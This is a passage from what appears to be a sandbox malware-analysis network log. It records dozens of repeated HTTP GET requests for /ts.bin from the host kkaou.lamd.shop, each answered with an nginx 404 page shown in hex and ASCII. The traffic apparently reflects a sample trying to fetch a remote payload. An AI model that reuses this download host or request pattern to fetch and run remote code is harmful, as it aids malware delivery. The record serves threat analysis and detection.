                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:02.551356077 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:02.937386036 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:48 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:03.051306009 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:03.438530922 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:48 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:03.551541090 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:03.937412024 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:49 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:04.051511049 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:04.439822912 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:49 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:04.577209949 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:04.985121965 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:50 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:11:05.270195007 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:05.656116962 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:51 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:05.770287037 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:06.156219006 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:51 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:06.270925045 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:06.657069921 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:52 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:06.770426035 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:07.158606052 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:52 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:11:07.457627058 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:07.843770027 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:53 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:07.959292889 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:08.345781088 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:53 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:08.457787991 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:08.843736887 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:54 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:11:09.145149946 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:09.532974958 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:55 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:09.647196054 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:10.033322096 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:55 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:10.146238089 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:10.532082081 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
